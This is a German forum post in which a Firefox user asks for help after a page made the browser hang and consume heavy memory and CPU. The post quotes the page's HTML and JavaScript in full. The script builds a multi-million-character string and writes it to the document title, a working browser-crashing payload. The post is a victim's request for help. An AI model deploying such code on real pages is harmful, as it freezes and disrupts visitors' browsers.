Hallo,
ich habe ein ernsthaftes Problem, dass momentan dafür sorgt mal wieder mit dem alten IE durch das Web zu streifen:
Ich bin heute im Laufe meiner täglichen Wanderung durch das WWW mit meinem feurigen Fuchs auf eine Seite gestoßen, die mir zuerst völlig harmlos erschien.
Als ich dann jedoch später merkte, dass Firefox beim Öffnen ungefähr 100 bis 120 MB an Arbeitsspeicher sowie etwa 50 % der CPU-Ressourcen (habe eine 3,4 GHz intus) verschlingt, kam ich auf den Gedanken dass diese Seite evtl. etwas damit zu tun haben könnte. Nun ja, während Firefox den PC nahezu lahm legt (sich selbst aufhängt und sich nur noch per Task-Manager beenden lässt) hab ich mir mal die Seite etwas genauer angesehen und folgendes JavaScript im Header der Seite entdeckt:
<html><head><title>You will be fucked</title><script type="text/javascript">
function ex() {
var buffer = "";
for (var i = 0; i < 5000; i++) {
buffer += "A";
}
var buffer2 = buffer;
for (i = 0; i < 500; i++) {
buffer2 += buffer;
}
document.title = buffer2;
}
</script></head><body><div style="height:100%;width:100%;background-color:#e87;text-align:center;" onclick="javascript:ex();"><strong>Ne clique pas ici</strong><br><strong>dont click here</strong></div></body></html>
Alles anzeigen
Vielleicht sind ja ein paar JavaScript-Experten hier unterwegs, aber soweit ich das verstehe, schreibt das Skript einfach immens viel Zeichen in den Speicher...oder so. :?
Das komische ist, dass ich nicht verstehe wie dies nachhaltig den Start von Firefox beeinflussen kann. Achja, nur nebenbei: Nach etwa 3-4 Minuten - wenn sich der Firefox wieder gefangen hat - läuft dieser auch ganz normal mit etwa 10 MB Arbeitsspeicher und öffnet ganz brav die Startseite.
Und da ich nicht wirklich Lust habe Firefox nochmal komplett neu zu installieren, die Addons, Themes, Einstellungen und Lesezeichen wiederherzustellen und/oder zu konfigurieren dachte ich mir IHR habt vielleicht einen Ratschlag für mich.
Bin jedem dankbar der mir irgendwie weiterhelfen kann, sodaß ich den IE bald wie verbannen kann...